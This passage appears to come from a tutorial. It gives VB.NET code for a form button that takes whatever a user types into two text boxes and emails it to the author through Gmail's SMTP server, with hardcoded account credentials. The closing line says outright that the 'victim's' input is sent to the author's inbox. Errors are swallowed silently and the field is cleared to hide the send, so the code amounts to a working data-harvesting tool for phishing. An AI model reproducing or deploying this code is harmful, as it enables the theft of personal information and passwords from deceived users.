After you get the form the way you want it...time for the code...
Above EVERYTHING put this--> Imports System.Net.Mail
Double click Button1 and put this...
Dim MyMailMessage As New MailMessage()
Try
MyMailMessage.From = New MailAddress("Your gmail account")
MyMailMessage.To.Add("Your email account")
MyMailMessage.Subject = TextBox1.Text
MyMailMessage.Body = TextBox2.Text
Dim SMTP As New SmtpClient("smtp.gmail.com")
SMTP.Port = 587
SMTP.EnableSsl = True
SMTP.Credentials = New System.Net.NetworkCredential("Gmail account", "Gmail password")
SMTP.Send(MyMailMessage)
TextBox2.Text = ""
Catch ex As Exception
End Try
End Sub
Just put your info in where I specified so the information the victim types in will get sent to your e-mail
